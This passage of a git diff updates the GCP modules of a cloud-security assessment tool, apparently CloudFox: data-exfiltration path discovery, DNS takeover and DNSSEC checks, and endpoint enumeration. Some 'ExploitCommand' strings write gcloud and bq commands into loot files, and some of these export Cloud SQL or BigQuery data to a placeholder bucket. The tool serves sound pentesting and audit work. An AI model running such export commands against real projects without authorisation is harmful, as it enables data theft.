permissions\n"+ + "gcloud sql instances describe %s --project=%s\n"+ + "# Export if permitted\n"+ + "gcloud sql export sql %s gs://bucket/export.sql --database=mydb", + instance.Name, projectID, instance.Name), + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } + } } -// analyzeExfiltrationVectors analyzes potential exfiltration methods -func (m *DataExfiltrationModule) analyzeExfiltrationVectors(ctx context.Context, projectID string, logger internal.Logger) { - // Common exfiltration vectors in GCP - vectors := []ExfiltrationPath{ - { - PathType: "bigquery_export", - ResourceName: "*", - ProjectID: projectID, - Description: "BigQuery datasets can be exported to GCS or queried directly", - Destination: "GCS bucket or external table", - RiskLevel: "MEDIUM", - RiskReasons: []string{"BigQuery may contain sensitive data", "Export destination may be accessible"}, - ExploitCommand: fmt.Sprintf( - "# List BigQuery datasets\n"+ - "bq ls --project_id=%s\n"+ - "# Export table to GCS\n"+ - "bq extract --destination_format=CSV 'dataset.table' gs://bucket/export.csv", - projectID), - }, - { - PathType: "pubsub_subscription", - ResourceName: "*", - ProjectID: projectID, - Description: "Pub/Sub push subscriptions can send data to external endpoints", - Destination: "External HTTP endpoint", - RiskLevel: "HIGH", - RiskReasons: []string{"Push subscriptions send data to configured endpoints", "Endpoint may be attacker-controlled"}, - ExploitCommand: fmt.Sprintf( - "# List Pub/Sub topics and subscriptions\n"+ - "gcloud pubsub topics list --project=%s\n"+ - "gcloud pubsub subscriptions list --project=%s", - projectID, projectID), - }, - { - PathType: "cloud_functions", - ResourceName: "*", - ProjectID: projectID, - Description: "Cloud Functions can be used to exfiltrate data via HTTP", - Destination: "External HTTP endpoint", - RiskLevel: "HIGH", - RiskReasons: []string{"Functions can make outbound HTTP requests", "Can access internal resources and exfiltrate data"}, - ExploitCommand: fmt.Sprintf( - "# List Cloud Functions\n"+ - "gcloud functions list --project=%s", - projectID), - }, - } - - m.mu.Lock() - m.ExfiltrationPaths = append(m.ExfiltrationPaths, vectors...) - for _, v := range vectors { - m.addExfiltrationPathToLoot(v) - } - m.mu.Unlock() +// findStorageTransferJobs finds Storage Transfer Service jobs to external destinations +func (m *DataExfiltrationModule) findStorageTransferJobs(ctx context.Context, projectID string, logger internal.Logger) { + stsService, err := storagetransfer.NewService(ctx) + if err != nil { + return + } + + // List transfer jobs for this project - filter is a required parameter + filter := fmt.Sprintf(`{"projectId":"%s"}`, projectID) + req := stsService.TransferJobs.List(filter) + err = req.Pages(ctx, func(page *storagetransfer.ListTransferJobsResponse) error { + for _, job := range page.TransferJobs { + if job.Status != "ENABLED" { + continue + } + + // Check for external destinations (AWS S3, Azure Blob, HTTP) + var destination string + var destType string + var isExternal bool + + if job.TransferSpec != nil { + if job.TransferSpec.AwsS3DataSource != nil { + destination = fmt.Sprintf("s3://%s", job.TransferSpec.AwsS3DataSource.BucketName) + destType = "AWS S3" + isExternal = true + } + if job.TransferSpec.AzureBlobStorageDataSource != nil { + destination = fmt.Sprintf("azure://%s/%s", + job.TransferSpec.AzureBlobStorageDataSource.StorageAccount, + job.TransferSpec.AzureBlobStorageDataSource.Container) + destType = "Azure Blob" + isExternal = true + } + if job.TransferSpec.HttpDataSource != nil { + destination = job.TransferSpec.HttpDataSource.ListUrl + destType = "HTTP" + isExternal = true + } + } + + if isExternal { + path := ExfiltrationPath{ + PathType: "Storage Transfer", + ResourceName: job.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Transfer job to %s", destType), + Destination: destination, + RiskLevel: "HIGH", + RiskReasons: []string{"Data transferred to external cloud provider", "Destination outside GCP control"}, + ExploitCommand: fmt.Sprintf( + "# View transfer job\n"+ + "gcloud transfer jobs describe %s", + job.Name), + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list Storage Transfer jobs for project %s", projectID)) + } } // ------------------------------ @@ -492,19 +867,7 @@ func (m *DataExfiltrationModule) initializeLootFiles() { // formatExfilType converts internal type names to user-friendly display names func formatExfilType(pathType string) string { - typeMap := map[string]string{ - "snapshot": "Disk Snapshot", - "image": "VM Image", - "bucket": "Storage Bucket", - "bigquery_export": "BigQuery Export", - "pubsub_subscription": "Pub/Sub Subscription", - "cloud_functions": "Cloud Function", - "logging_sink": "Logging Sink", - } - if friendly, ok := typeMap[pathType]; ok { - return friendly - } - return pathType + return pathType // Already formatted in the new module } func (m *DataExfiltrationModule) addExfiltrationPathToLoot(path ExfiltrationPath) { @@ -512,27 +875,46 @@ func (m *DataExfiltrationModule) addExfiltrationPathToLoot(path ExfiltrationPath return } - // Add to consolidated commands file with description m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf( "## %s: %s (Project: %s)\n"+ "# %s\n"+ "# Destination: %s\n", - formatExfilType(path.PathType), + path.PathType, path.ResourceName, path.ProjectID, path.Description, path.Destination, ) - // Add exploit commands m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand) } // ------------------------------ // Output Generation // ------------------------------ + +// getExfilDescription returns a user-friendly description of the exfiltration path type +func getExfilDescription(pathType string) string { + descriptions := map[string]string{ + "Public Snapshot": "Disk snapshot can be copied to create new disks externally", + "Public Image": "VM image can be used to launch instances externally", + "Public Bucket": "GCS bucket contents can be downloaded by anyone", + "Logging Sink": "Logs can be exported to a cross-project destination", + "Pub/Sub Push": "Messages can be pushed to an external HTTP endpoint", + "Pub/Sub BigQuery Export": "Messages can be exported to BigQuery in another project", + "Pub/Sub GCS Export": "Messages can be exported to a Cloud Storage bucket", + "Public BigQuery": "BigQuery dataset can be queried and exported by anyone", + "Cloud SQL Export": "Cloud SQL data can be exported via CDC or backup", + "Storage Transfer": "Data can be transferred to external cloud providers", + } + + if desc, ok := descriptions[pathType]; ok { + return desc + } + return "Data can be exfiltrated via this path" +} + func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Single merged table for all exfiltration paths header := []string{ "Project ID", "Project Name", @@ -540,12 +922,14 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna "Type", "Destination", "Public", - "Size", + "VPC-SC Protected", + "Org Policy Protected", + "Description", } var body [][]string - // Track which resources we've added from PublicExports to avoid duplicates + // Track which resources we've added from PublicExports publicResources := make(map[string]PublicExport) for _, e := range m.PublicExports { key := fmt.Sprintf("%s:%s:%s", e.ProjectID, e.ResourceType, e.ResourceName) @@ -554,40 +938,64 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna // Add exfiltration paths for _, p := range m.ExfiltrationPaths { - // Check if this is also in public exports key := fmt.Sprintf("%s:%s:%s", p.ProjectID, p.PathType, p.ResourceName) - publicExport, isPublic := publicResources[key] + _, isPublic := publicResources[key] publicStatus := "No" - size := "-" if isPublic { publicStatus = "Yes" - size = publicExport.Size - // Remove from map so we don't add it again delete(publicResources, key) } + // Check VPC-SC protection + vpcscProtected := "No" + if m.vpcscProtectedProj[p.ProjectID] || p.VPCSCProtected { + vpcscProtected = "Yes" + } + + // Check org policy protection + orgPolicyProtected := "No" + if m.isOrgPolicyProtected(p.ProjectID) { + orgPolicyProtected = "Yes" + } + body = append(body, []string{ p.ProjectID, m.GetProjectName(p.ProjectID), p.ResourceName, - formatExfilType(p.PathType), + p.PathType, p.Destination, publicStatus, - size, + vpcscProtected, + orgPolicyProtected, + getExfilDescription(p.PathType), }) } // Add any remaining public exports not already covered for _, e := range publicResources { + // Check VPC-SC protection + vpcscProtected := "No" + if m.vpcscProtectedProj[e.ProjectID] { + vpcscProtected = "Yes" + } + + // Check org policy protection + orgPolicyProtected := "No" + if m.isOrgPolicyProtected(e.ProjectID) { + orgPolicyProtected = "Yes" + } + body = append(body, []string{ e.ProjectID, m.GetProjectName(e.ProjectID), e.ResourceName, - formatExfilType(e.ResourceType), + e.ResourceType, "Public access", "Yes", - e.Size, + vpcscProtected, + orgPolicyProtected, + getExfilDescription(e.ResourceType), }) } @@ -615,13 +1023,11 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna Loot: lootFiles, } - // Build scope names with project names scopeNames := make([]string, len(m.ProjectIDs)) for i, projectID := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(projectID) } - // Write output err := internal.HandleOutputSmart( "gcp", m.Format, diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go index 9efb9b06..d2b53bdb 100644 --- a/gcp/commands/dns.go +++ b/gcp/commands/dns.go @@ -47,10 +47,11 @@ Attack Surface: type DNSModule struct { gcpinternal.BaseGCPModule - Zones []DNSService.ZoneInfo - Records []DNSService.RecordInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + Zones []DNSService.ZoneInfo + Records []DNSService.RecordInfo + TakeoverRisks []DNSService.TakeoverRisk + LootMap map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -77,6 +78,7 @@ func runGCPDNSCommand(cmd *cobra.Command, args []string) { BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), Zones: []DNSService.ZoneInfo{}, Records: []DNSService.RecordInfo{}, + TakeoverRisks: []DNSService.TakeoverRisk{}, LootMap: make(map[string]*internal.LootFile), } @@ -95,17 +97,30 @@ func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { return } - // Count zone types + // Count zone types and security issues publicCount := 0 privateCount := 0 + transferModeCount := 0 + dnssecOffCount := 0 + for _, zone := range m.Zones { if zone.Visibility == "public" { publicCount++ + // Check DNSSEC status for public zones + if zone.DNSSECState == "" || zone.DNSSECState == "off" { + dnssecOffCount++ + } else if zone.DNSSECState == "transfer" { + transferModeCount++ + } } else { privateCount++ } } + // Check for subdomain takeover risks + ds := DNSService.New() + m.TakeoverRisks = ds.CheckTakeoverRisks(m.Records) + msg := fmt.Sprintf("Found %d zone(s), %d record(s)", len(m.Zones), len(m.Records)) if publicCount > 0 { msg += fmt.Sprintf(" [%d public]", publicCount) @@ -115,6 +130,17 @@ func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { } logger.SuccessM(msg, globals.GCP_DNS_MODULE_NAME) + // Log security warnings + if dnssecOffCount > 0 { + logger.InfoM(fmt.Sprintf("[SECURITY] %d public zone(s) have DNSSEC disabled", dnssecOffCount), globals.GCP_DNS_MODULE_NAME) + } + if transferModeCount > 0 { + logger.InfoM(fmt.Sprintf("[SECURITY] %d zone(s) in DNSSEC transfer mode (vulnerable during migration)", transferModeCount), globals.GCP_DNS_MODULE_NAME) + } + if len(m.TakeoverRisks) > 0 { + logger.InfoM(fmt.Sprintf("[SECURITY] %d potential subdomain takeover risk(s) detected", len(m.TakeoverRisks)), globals.GCP_DNS_MODULE_NAME) + } + m.writeOutput(ctx, logger) } @@ -209,6 +235,7 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { "DNS Name", "Visibility", "DNSSEC", + "Security", "Networks/Peering", "Forwarding", "IAM Role", @@ -223,6 +250,18 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { dnssec = "off" } + // Format security status + security := "-" + if zone.Visibility == "public" { + if zone.DNSSECState == "" || zone.DNSSECState == "off" { + security = "DNSSEC Disabled" + } else if zone.DNSSECState == "transfer" { + security = "Transfer Mode (Vulnerable)" + } else if zone.DNSSECState == "on" { + security = "OK" + } + } + // Format networks/peering networkInfo := "-" if len(zone.PrivateNetworks) > 0 { @@ -250,6 +289,7 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { zone.DNSName, zone.Visibility, dnssec, + security, networkInfo, forwarding, binding.Role, @@ -265,6 +305,7 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { zone.DNSName, zone.Visibility, dnssec, + security, networkInfo, forwarding, "-", @@ -273,13 +314,30 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { } } - // Records table (interesting types only, no truncation) + // Records table (interesting types only, with takeover risk column) recordsHeader := []string{ "Zone", "Name", "Type", "TTL", "Data", + "Takeover Risk", + } + + // Build a map of takeover risks by record name for quick lookup + takeoverRiskMap := make(map[string]DNSService.TakeoverRisk) + for _, risk := range m.TakeoverRisks { + takeoverRiskMap[risk.RecordName] = risk + + // Add to loot file + m.LootMap["dns-commands"].Contents += fmt.Sprintf( + "# [TAKEOVER RISK] %s -> %s (%s)\n"+ + "# Risk: %s - %s\n"+ + "# Verify with:\n%s\n\n", + risk.RecordName, risk.Target, risk.Service, + risk.RiskLevel, risk.Description, + risk.Verification, + ) } var recordsBody [][]string @@ -292,12 +350,19 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { // Format data - no truncation data := strings.Join(record.RRDatas, ", ") + // Check for takeover risk + takeoverRisk := "-" + if risk, exists := takeoverRiskMap[record.Name]; exists { + takeoverRisk = fmt.Sprintf("%s (%s)", risk.RiskLevel, risk.Service) + } + recordsBody = append(recordsBody, []string{ record.ZoneName, record.Name, record.Type, fmt.Sprintf("%d", record.TTL), data, + takeoverRisk, }) } diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go index 1f3baa78..c203878e 100644 --- a/gcp/commands/endpoints.go +++ b/gcp/commands/endpoints.go @@ -6,11 +6,21 @@ import ( "strings" "sync" + cloudsqlservice "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + dataprocservice "github.com/BishopFox/cloudfox/gcp/services/dataprocService" + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + functionsservice "github.com/BishopFox/cloudfox/gcp/services/functionsService" + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + memorystoreservice "github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + appengine "google.golang.org/api/appengine/v1" compute "google.golang.org/api/compute/v1" run "google.golang.org/api/run/v1" ) @@ -18,19 +28,29 @@ import ( var GCPEndpointsCommand = &cobra.Command{ Use: "endpoints", Aliases: []string{"exposure", "external", "public-ips", "internet-facing"}, - Short: "Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames", + Short: "Enumerate all network endpoints (external and internal) with IPs, URLs, and hostnames", Long: `Enumerate all network endpoints in GCP with comprehensive analysis. Features: -- Enumerates external IP addresses (static and ephemeral) -- Enumerates internal IP addresses for instances -- Lists load balancers (HTTP(S), TCP, UDP) - both external and internal -- Shows instances with external and internal IPs -- Lists Cloud Run and Cloud Functions URLs -- Analyzes firewall rules to determine open ports -- Generates nmap commands for penetration testing - -Output includes separate tables and loot files for external and internal endpoints.`, +- Static external IP addresses +- Compute Engine instances (external and internal IPs) +- Load balancers (HTTP(S), TCP, UDP) - external and internal +- Cloud Run services and jobs +- Cloud Functions HTTP triggers +- GKE cluster API endpoints +- Cloud SQL instances (MySQL, PostgreSQL, SQL Server) +- Memorystore Redis instances +- Filestore NFS instances +- Cloud Composer/Airflow web UI URLs +- Pub/Sub push subscription endpoints +- App Engine services +- Vertex AI Notebooks +- Dataproc clusters (master/worker nodes) +- VPN Gateways +- Cloud NAT gateways +- Private Service Connect endpoints + +Output includes a unified table with Exposure (External/Internal) column.`, Run: runGCPEndpointsCommand, } @@ -41,9 +61,10 @@ Output includes separate tables and loot files for external and internal endpoin type Endpoint struct { ProjectID string Name string - Type string // Static IP, Instance IP, LoadBalancer, Cloud Run, etc. - Address string - FQDN string + Type string // Static IP, Instance, LoadBalancer, Cloud Run, GKE, Cloud SQL, etc. + ExternalIP string + InternalIP string + Hostname string Protocol string Port string Resource string @@ -52,24 +73,9 @@ type Endpoint struct { Status string ServiceAccount string TLSEnabled bool - RiskLevel string - RiskReasons []string - IsExternal bool // true for external IPs, false for internal - NetworkTags []string // Tags for firewall rule matching - Network string // VPC network name -} - -type FirewallRule struct { - ProjectID string - RuleName string - Network string - Direction string - SourceRanges []string - Ports []string - Protocol string - TargetTags []string - RiskLevel string - RiskReasons []string + IsExternal bool // true for external, false for internal + Network string // VPC network name + Security string // Security notes (e.g., "No Auth", "Public", "SSL Required") } // ------------------------------ @@ -78,14 +84,11 @@ type FirewallRule struct { type EndpointsModule struct { gcpinternal.BaseGCPModule - ExternalEndpoints []Endpoint - InternalEndpoints []Endpoint - FirewallRules []FirewallRule - LootMap map[string]*internal.LootFile - mu sync.Mutex + Endpoints []Endpoint + LootMap map[string]*internal.LootFile + mu sync.Mutex // Firewall rule mapping: "network:tag1,tag2" -> allowed ports - // Key format: "network-name" for rules with no target tags, or "network-name:tag1,tag2" for tagged rules firewallPortMap map[string][]string } @@ -110,12 +113,10 @@ func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { } module := &EndpointsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ExternalEndpoints: []Endpoint{}, - InternalEndpoints: []Endpoint{}, - FirewallRules: []FirewallRule{}, - LootMap: make(map[string]*internal.LootFile), - firewallPortMap: make(map[string][]string), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Endpoints: []Endpoint{}, + LootMap: make(map[string]*internal.LootFile), + firewallPortMap: make(map[string][]string), } module.initializeLootFiles() @@ -128,14 +129,24 @@ func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { func (m *EndpointsModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "endpoints", m.processProject) - totalEndpoints := len(m.ExternalEndpoints) + len(m.InternalEndpoints) - if totalEndpoints == 0 && len(m.FirewallRules) == 0 { + if len(m.Endpoints) == 0 { logger.InfoM("No endpoints found", "endpoints") return } - logger.SuccessM(fmt.Sprintf("Found %d external endpoint(s), %d internal endpoint(s), %d firewall rule(s)", - len(m.ExternalEndpoints), len(m.InternalEndpoints), len(m.FirewallRules)), "endpoints") + // Count external vs internal + externalCount := 0 + internalCount := 0 + for _, ep := range m.Endpoints { + if ep.IsExternal { + externalCount++ + } else { + internalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d endpoint(s) [%d external, %d internal]", + len(m.Endpoints), externalCount, internalCount), "endpoints") m.writeOutput(ctx, logger) } @@ -153,116 +164,120 @@ func (m *EndpointsModule) processProject(ctx context.Context, projectID string, m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, "endpoints", fmt.Sprintf("Could not create Compute service in project %s", projectID)) - return + } else { + // Compute-based endpoints + m.analyzeFirewallRules(ctx, computeService, projectID, logger) + m.getStaticExternalIPs(ctx, computeService, projectID, logger) + m.getInstanceIPs(ctx, computeService, projectID, logger) + m.getLoadBalancers(ctx, computeService, projectID, logger) + m.getVPNGateways(ctx, computeService, projectID, logger) + m.getCloudNAT(ctx, computeService, projectID, logger) + m.getPrivateServiceConnect(ctx, computeService, projectID, logger) } - // 1. Analyze firewall rules FIRST to build port mapping for instances - m.analyzeFirewallRules(ctx, computeService, projectID, logger) + // Serverless endpoints + m.getCloudRunServices(ctx, projectID, logger) + m.getCloudFunctions(ctx, projectID, logger) + m.getAppEngineServices(ctx, projectID, logger) + + // Container/Kubernetes endpoints + m.getGKEClusters(ctx, projectID, logger) - // 2. Get static external IPs - m.getStaticExternalIPs(ctx, computeService, projectID, logger) + // Database endpoints + m.getCloudSQLInstances(ctx, projectID, logger) + m.getMemorystoreRedis(ctx, projectID, logger) - // 3. Get instances (both external and internal IPs) - m.getInstanceIPs(ctx, computeService, projectID, logger) + // Storage endpoints + m.getFilestoreInstances(ctx, projectID, logger) - // 4. Get load balancers (both external and internal) - m.getLoadBalancers(ctx, computeService, projectID, logger) + // Data/ML endpoints + m.getComposerEnvironments(ctx, projectID, logger) + m.getDataprocClusters(ctx, projectID, logger) + m.getNotebookInstances(ctx, projectID, logger) - // 5. Get Cloud Run services (always external) - m.getCloudRunServices(ctx, projectID, logger) + // Messaging endpoints + m.getPubSubPushEndpoints(ctx, projectID, logger) } // getStaticExternalIPs retrieves static external IP addresses func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { // Global addresses req := svc.GlobalAddresses.List(projectID) - err := req.Pages(ctx, func(page *compute.AddressList) error { + _ = req.Pages(ctx, func(page *compute.AddressList) error { for _, addr := range page.Items { if addr.AddressType == "EXTERNAL" { user := "" if len(addr.Users) > 0 { user = extractResourceName(addr.Users[0]) } + security := "" + if user == "" { + security = "Unused" + } ep := Endpoint{ ProjectID: projectID, Name: addr.Name, Type: "Static IP", - Address: addr.Address, + ExternalIP: addr.Address, Protocol: "TCP/UDP", Port: "ALL", Resource: user, ResourceType: "Address", Region: "global", Status: addr.Status, - RiskLevel: "Medium", - RiskReasons: []string{"Static external IP"}, IsExternal: true, - } - if user == "" { - ep.RiskReasons = append(ep.RiskReasons, "Unused static IP") + Security: security, } m.addEndpoint(ep) } } return nil }) - if err != nil { - gcpinternal.HandleGCPError(err, logger, "endpoints", - fmt.Sprintf("Could not list global addresses in project %s", projectID)) - } // Regional addresses regionsReq := svc.Regions.List(projectID) - err = regionsReq.Pages(ctx, func(page *compute.RegionList) error { + _ = regionsReq.Pages(ctx, func(page *compute.RegionList) error { for _, region := range page.Items { addrReq := svc.Addresses.List(projectID, region.Name) - err := addrReq.Pages(ctx, func(addrPage *compute.AddressList) error { + _ = addrReq.Pages(ctx, func(addrPage *compute.AddressList) error { for _, addr := range addrPage.Items { if addr.AddressType == "EXTERNAL" { user := "" if len(addr.Users) > 0 { user = extractResourceName(addr.Users[0]) } + security := "" + if user == "" { + security = "Unused" + } ep := Endpoint{ ProjectID: projectID, Name: addr.Name, Type: "Static IP", - Address: addr.Address, + ExternalIP: addr.Address, Protocol: "TCP/UDP", Port: "ALL", Resource: user, ResourceType: "Address", Region: region.Name, Status: addr.Status, - RiskLevel: "Medium", - RiskReasons: []string{"Static external IP"}, IsExternal: true, - } - if user == "" { - ep.RiskReasons = append(ep.RiskReasons, "Unused static IP") + Security: security, } m.addEndpoint(ep) } } return nil }) - if err != nil { - gcpinternal.HandleGCPError(err, logger, "endpoints", - fmt.Sprintf("Could not list addresses in region %s", region.Name)) - } } return nil }) - if err != nil { - gcpinternal.HandleGCPError(err, logger, "endpoints", - fmt.Sprintf("Could not list regions in project %s", projectID)) - } } // getInstanceIPs retrieves instances with both external and internal IPs func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { req := svc.Instances.AggregatedList(projectID) - err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + _ = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { for zone, scopedList := range page.Items { if scopedList.Instances == nil { continue @@ -270,7 +285,6 @@ func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Servi for _, instance := range scopedList.Instances { zoneName := extractZoneFromScope(zone) - // Get service account var serviceAccount string if len(instance.ServiceAccounts) > 0 { serviceAccount = instance.ServiceAccounts[0].Email @@ -278,57 +292,54 @@ func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Servi for _, iface := range instance.NetworkInterfaces { networkName := extractResourceName(iface.Network) + internalIP := iface.NetworkIP - // Collect external IPs + // External IP for _, accessConfig := range iface.AccessConfigs { if accessConfig.NatIP != "" { ep := Endpoint{ ProjectID: projectID, Name: instance.Name, - Type: "Instance IP", - Address: accessConfig.NatIP, + Type: "Compute Engine", + ExternalIP: accessConfig.NatIP, + InternalIP: internalIP, Protocol: "TCP/UDP", Port: "ALL", - Resource: instance.Name, ResourceType: "Instance", Region: zoneName, Status: instance.Status, ServiceAccount: serviceAccount, IsExternal: true, - NetworkTags: instance.Tags.Items, Network: networkName, } - - // Classify risk - ep.RiskLevel, ep.RiskReasons = m.classifyInstanceRisk(instance) - m.addEndpoint(ep) } } - // Collect internal IPs - if iface.NetworkIP != "" { - // Determine ports from firewall rules + // Internal only (no external IP) + hasExternalIP := false + for _, accessConfig := range iface.AccessConfigs { + if accessConfig.NatIP != "" { + hasExternalIP = true + break + } + } + if !hasExternalIP && internalIP != "" { ports := m.getPortsForInstance(networkName, instance.Tags) - ep := Endpoint{ ProjectID: projectID, Name: instance.Name, - Type: "Internal IP", - Address: iface.NetworkIP, + Type: "Compute Engine", + InternalIP: internalIP, Protocol: "TCP/UDP", Port: ports, - Resource: instance.Name, ResourceType: "Instance", Region: zoneName, Status: instance.Status, ServiceAccount: serviceAccount, IsExternal: false, - NetworkTags: instance.Tags.Items, Network: networkName, } - - ep.RiskLevel, ep.RiskReasons = m.classifyInternalInstanceRisk(instance, ports) m.addEndpoint(ep) } } @@ -336,22 +347,16 @@ func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Servi } return nil }) - if err != nil { - gcpinternal.HandleGCPError(err, logger, "endpoints", - fmt.Sprintf("Could not list instances in project %s", projectID)) - } } // getPortsForInstance determines open ports for an instance based on firewall rules func (m *EndpointsModule) getPortsForInstance(network string, tags *compute.Tags) string { var allPorts []string - // Check for rules with no target tags (apply to all instances in network) if ports, ok := m.firewallPortMap[network]; ok { allPorts = append(allPorts, ports...) } - // Check for rules matching instance tags if tags != nil { for _, tag := range tags.Items { key := fmt.Sprintf("%s:%s", network, tag) @@ -362,10 +367,9 @@ func (m *EndpointsModule) getPortsForInstance(network string, tags *compute.Tags } if len(allPorts) == 0 { - return "ALL" // Unknown, scan all ports + return "ALL" } - // Deduplicate ports portSet := make(map[string]bool) for _, p := range allPorts { portSet[p] = true @@ -378,49 +382,11 @@ func (m *EndpointsModule) getPortsForInstance(network string, tags *compute.Tags return strings.Join(uniquePorts, ",") } -// classifyInternalInstanceRisk determines risk for internal endpoints -func (m *EndpointsModule) classifyInternalInstanceRisk(instance *compute.Instance, ports string) (string, []string) { - var reasons []string - score := 0 - - reasons = append(reasons, "Internal network access") - - for _, sa := range instance.ServiceAccounts { - if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { - reasons = append(reasons, "Uses default Compute Engine SA") - score += 1 - } - - for _, scope := range sa.Scopes { - if scope == "https://www.googleapis.com/auth/cloud-platform" { - reasons = append(reasons, "Has cloud-platform scope") - score += 2 - } - } - } - - // Check for dangerous ports - dangerousPorts := []string{"22", "3389", "3306", "5432", "27017", "6379"} - for _, dp := range dangerousPorts { - if strings.Contains(ports, dp) { - score += 1 - break - } - } - - if score >= 3 { - return "High", reasons - } else if score >= 1 { - return "Medium", reasons - } - return "Low", reasons -} - // getLoadBalancers retrieves both external and internal load balancers func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { // Regional forwarding rules req := svc.ForwardingRules.AggregatedList(projectID) - err := req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + _ = req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { for region, scopedList := range page.Items { if scopedList.ForwardingRules == nil { continue @@ -441,62 +407,47 @@ func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Ser isExternal := rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" isInternal := rule.LoadBalancingScheme == "INTERNAL" || rule.LoadBalancingScheme == "INTERNAL_MANAGED" || rule.LoadBalancingScheme == "INTERNAL_SELF_MANAGED" - if isExternal { - ep := Endpoint{ - ProjectID: projectID, - Name: rule.Name, - Type: "LoadBalancer", - Address: rule.IPAddress, - Protocol: rule.IPProtocol, - Port: ports, - Resource: target, - ResourceType: "ForwardingRule", - Region: extractRegionFromScope(region), - TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), - RiskLevel: "Medium", - RiskReasons: []string{"External load balancer"}, - IsExternal: true, - Network: extractResourceName(rule.Network), - } + lbType := "LoadBalancer" + if isInternal { + lbType = "Internal LB" + } - if !ep.TLSEnabled && ports != "443" { - ep.RiskLevel = "High" - ep.RiskReasons = append(ep.RiskReasons, "No TLS/HTTPS") + if isExternal || isInternal { + tlsEnabled := rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https") + security := "" + if isExternal && !tlsEnabled && ports != "443" { + security = "No TLS" } - m.addEndpoint(ep) - } else if isInternal { ep := Endpoint{ ProjectID: projectID, Name: rule.Name, - Type: "Internal LB", - Address: rule.IPAddress, + Type: lbType, Protocol: rule.IPProtocol, Port: ports, Resource: target, ResourceType: "ForwardingRule", Region: extractRegionFromScope(region), - TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), - RiskLevel: "Low", - RiskReasons: []string{"Internal load balancer"}, - IsExternal: false, + TLSEnabled: tlsEnabled, + IsExternal: isExternal, Network: extractResourceName(rule.Network), + Security: security, + } + if isExternal { + ep.ExternalIP = rule.IPAddress + } else { + ep.InternalIP = rule.IPAddress } - m.addEndpoint(ep) } } } return nil }) - if err != nil { - gcpinternal.HandleGCPError(err, logger, "endpoints", - fmt.Sprintf("Could not list forwarding rules in project %s", projectID)) - } - // Global forwarding rules (external only - no internal global LBs) + // Global forwarding rules globalReq := svc.GlobalForwardingRules.List(projectID) - err = globalReq.Pages(ctx, func(page *compute.ForwardingRuleList) error { + _ = globalReq.Pages(ctx, func(page *compute.ForwardingRuleList) error { for _, rule := range page.Items { if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { ports := "ALL" @@ -504,44 +455,159 @@ func (m *EndpointsModule) 